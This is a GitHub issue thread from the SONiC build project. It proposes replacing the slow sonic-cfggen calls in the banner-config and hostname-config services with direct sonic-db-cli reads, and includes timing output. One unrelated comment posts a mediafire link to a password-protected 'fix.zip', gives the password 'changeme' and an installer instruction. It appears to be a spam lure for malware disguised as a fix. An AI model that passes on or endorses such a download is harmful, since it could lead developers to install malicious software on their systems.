### ISSUE TITLE
Replace sonic-cfggen with sonic-db-cli in banner-config & hostname-config

### ISSUE THREAD

**Issue by vivekrnv** [sonic-net/sonic-buildimage#20048]
#### Description

sonic-cfggen is an expensive call to make especially on devices with weaker CPU's

Eg:
```
root@sn2700:/home/admin# time sonic-cfggen

real	0m0.484s
user	0m0.414s
sys	0m0.069s

root@sn2700/home/admin# time sonic-cfggen -d -v 'BANNER_MESSAGE["global"]["state"]'
disabled

real	0m0.726s
user	0m0.507s
sys	0m0.090s

root@rsn2700:/home/admin# time sonic-db-cli CONFIG_DB HGET "BANNER_MESSAGE|global" state
disabled

real	0m0.016s
user	0m0.014s
sys	0m0.001s
```

Services like banner-config, hostname-config just read from CONFIG_DB and proceed with their own stuff. Profiling with would show this. 

These services complete with swss start and add some lantency to the overall control plan downtime during WR/FW.

<img width="771" alt="image" src="https://github.com/user-attachments/assets/1dbf02d6-6fbb-4f64-b1db-55d9d7febd5a">

<img width="1244" alt="image" src="https://github.com/user-attachments/assets/0d1a8e98-b679-4840-a95e-43399da4dd3c">

There are straightforward calls to DB which doesn't require sonic-cfggen

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vivekrnv** [comment]
@SviatoslavBoichuk FYI for banner config
